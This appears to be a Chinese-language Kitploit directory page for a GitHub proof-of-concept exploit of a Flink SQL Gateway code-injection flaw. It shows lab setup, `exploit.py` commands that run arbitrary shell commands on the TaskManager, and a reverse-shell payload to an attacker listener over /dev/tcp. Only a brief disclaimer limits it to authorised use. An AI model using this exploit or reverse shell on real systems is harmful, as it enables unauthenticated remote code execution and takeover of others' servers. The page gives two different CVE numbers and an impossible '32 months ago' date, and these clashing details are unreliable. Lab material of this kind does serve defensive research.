Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-25194 — CVE-2026-25194 的概念验证漏洞利用程序与实验室环境 | Kitploit
工具/GitHubGitHub/dexsemon/cve-2026-25194
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育实验室与实践
GitHubdexsemon/cve-2026-25194

CVE-2026-25194

CVE-2026-25194 的概念验证漏洞利用程序与实验室环境

查看仓库
32个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-35194 — Apache Flink SQL 代码注入

通过 SQL 代码生成注入,在 Apache Flink TaskManager 上实现远程代码执行。

CVECVE-2026-35194
CVSS8.1(高危)
CWECWE-94 — 代码注入
受影响版本Flink 1.15.0 – 1.20.3 / 2.0.0 – 2.2.0
修复版本1.20.4 / 2.0.2 / 2.1.2 / 2.2.1
攻击面SQL Gateway REST API(默认端口 8083,无认证)

快速开始

1. 部署漏洞实验环境

root@kitploit:~
docker compose up -d

等待约 30 秒让集群启动。将启动两个服务:

  • Flink Web UI — http://localhost:8081
  • SQL Gateway REST API — http://localhost:8083

验证:

root@kitploit:~
curl -s http://localhost:8083/v1/info
# Should return version "1.20.3"

2. 安装依赖

root@kitploit:~
pip install requests

3. 漏洞利用

JSON 向量:

root@kitploit:~
python3 exploit.py localhost -p 8083 -v json -c "id > /tmp/pwned"

LIKE 向量:

root@kitploit:~
python3 exploit.py localhost -p 8083 -v like -c "id > /tmp/pwned"

仅版本检查(无 RCE):

root@kitploit:~
python3 exploit.py localhost -p 8083 --check-only

在 TaskManager 上验证 RCE:

root@kitploit:~
docker exec flink-taskmanager cat /tmp/pwned

4. 反弹 Shell

root@kitploit:~
# Terminal 1 — listener
nc -lvnp 4444

# Terminal 2 — exploit
python3 exploit.py TARGET -p 8083 -v json \
  -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"

用法

root@kitploit:~
usage: exploit.py [-h] [-p PORT] [-c COMMAND] [-v {json,like}]
                  [--check-only] [-t TIMEOUT] [--cert CERT] [--key KEY] [--ssl]
                  target

Options:
  target              Target host (IP or hostname)
  -p, --port          SQL Gateway port (default: 8083)
  -c, --command       Shell command to run on TaskManager
  -v, --vector        json (default) or like
  --check-only        Version check only, no exploit
  -t, --timeout       Request timeout in seconds (default: 30)
  --cert / --key      Client cert + key for mTLS environments
  --ssl               Force HTTPS

免责声明

仅用于授权安全研究和教育目的。

下载工具